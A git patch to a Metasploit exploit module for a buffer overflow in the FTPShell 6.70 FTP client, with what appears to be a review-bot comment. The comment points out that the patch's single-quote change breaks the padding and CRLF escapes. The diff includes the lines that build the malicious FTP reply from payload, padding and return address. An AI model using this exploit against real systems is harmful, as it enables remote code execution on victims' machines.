From bd2fb56adf2a392c45f0e020ebebe22bcd174706 Mon Sep 17 00:00:00 2001
From: Daniel Teixeira
Date: Thu, 28 Jun 2018 12:55:48 +0100
Subject: [PATCH] Update ftpshell_cli_bof.rb
---
 .../exploits/windows/ftp/ftpshell_cli_bof.rb | 21 ++++++++-----------
 1 file changed, 9 insertions(+), 12 deletions(-)
diff --git a/modules/exploits/windows/ftp/ftpshell_cli_bof.rb b/modules/exploits/windows/ftp/ftpshell_cli_bof.rb
index 3879d1a5da..9371946c3d 100644
--- a/modules/exploits/windows/ftp/ftpshell_cli_bof.rb
+++ b/modules/exploits/windows/ftp/ftpshell_cli_bof.rb
@@ -14,13 +14,13 @@ class MetasploitModule < Msf::Exploit::Remote
 super(update_info(info,
 'Name' => 'FTPShell client 6.70 (Enterprise edition) Stack Buffer Overflow',
 'Description' => %q{
- This module exploits a buffer overflow in the FTPShell client 6.70 (Enterprise edition) allowing remote
- code execution.
+ This module exploits a buffer overflow in the FTPShell client 6.70 (Enterprise
+ edition) allowing remote code execution.
 },
 'Author' =>
 [
- 'r4wd3r', # Original exploit author
- 'Daniel Teixeira ' # MSF module author
+ 'r4wd3r', # Original exploit author
+ 'Daniel Teixeira' # MSF module author
 ],
 'License' => MSF_LICENSE,
 'References' =>
@@ -45,13 +45,10 @@ class MetasploitModule < Msf::Exploit::Remote
 'SRVHOST' => '0.0.0.0',
 'EXITFUNC' => 'thread'
 },
- 'DisclosureDate' => 'May 15 2017',
+ 'DisclosureDate' => 'March 4 2017',
 'DefaultTarget' => 0))
- register_options(
- [
- OptPort.new('SRVPORT', [ true, "The FTP port to listen on", 21 ])
- ])
+ register_options [ OptPort.new('SRVPORT', [ true, 'The FTP port to listen on', 21 ]) ]
 end
 def exploit
@@ -94,11 +91,11 @@ class MetasploitModule < Msf::Exploit::Remote
 res = client.get_once.to_s.strip
 print_status("#{client.peerhost} - Request: #{res}")
- sploit = "220 \""
+ sploit = '220 "'
 sploit << payload.encoded
- sploit << "\x20"*(400-payload.encoded.length)
+ sploit << '\x20' * (payload_space - payload.encoded.length)
 sploit << target.ret
- sploit << "\" is current directory\r\n"
+ sploit << '" is current directory\r\n'
 print_status("#{client.peerhost} - Request: Sending the malicious response")
 client.put(sploit)
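Review bot: The quote-style cleanup on the `'\x20'` and `'" is current directory\r\n'` lines changes the bytes that are sent, because Ruby does not interpret `\x20`, `\r` or `\n` inside single-quoted strings. Each padding unit becomes four literal characters instead of one space, and the reply no longer ends in CRLF, so the string built here differs in length and termination from what the removed lines produced. Keep double quotes on those two lines, `sploit << "\x20" * (payload_space - payload.encoded.length)` and `sploit << "\" is current directory\r\n"`; the `'220 "'` line contains no escapes and is fine as written. `payload_space` presumably reads the payload 'Space' value declared in the module info, which is outside this hunk, so confirm it still matches the 400 it replaces. The enclosing method begins and ends outside the hunk.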